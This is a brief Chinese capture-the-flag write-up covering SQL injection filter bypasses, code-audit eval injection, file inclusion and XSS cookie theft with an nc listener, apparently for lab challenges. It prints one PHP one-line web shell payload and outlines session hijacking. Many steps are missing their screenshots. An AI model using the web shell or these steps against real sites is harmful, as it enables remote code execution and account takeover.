一、34051(sql注入)
1、输入用户名和特殊字符密码,发现个别字符被屏蔽,说明用户密码中存在sql注入漏洞。
2、想办法闭合语句,发现关键词大多数被屏蔽,尝试用or闭合,or被屏蔽,使用多写或大写可以绕过:
二、34061(sql注入)
1、题中给出查询语句,想办法闭合语句:
2、使用sql语句查询:
(1)order by测试列数为7:
(2)union select联合查询database()数据库名称,union被屏蔽,使用双写绕过:
(3)根据题目所给key所在的目录,load_file读取该文件:
三、34214(代码审计)
1、查看代码进行分析:
2、得到符合要求的输入:
拿到key
四、34223(文件包含)
1、绕过后缀
2、data伪协议写一句话木马:
data:text/plain,<?php @eval(&_POST['x']);?>
3、antsword查找key:
五、34224(xss)
1、提交获取cookie的命令,设置监听端口:
2、提交之后,nc监听8024端口,拿到key:
六、34234(代码审计)
1、查看代码,eval处存在一个执行漏洞,首先闭合前面的语句,再输入一句话木马尝试:
2、cat获取key,查看源代码:
七、34415(xss)
1、提交获取cookie代码,上传至端口9991:
2、nc监听端口9991:
3、cookie manger修改sessid:
4、绕过登录,拿到key: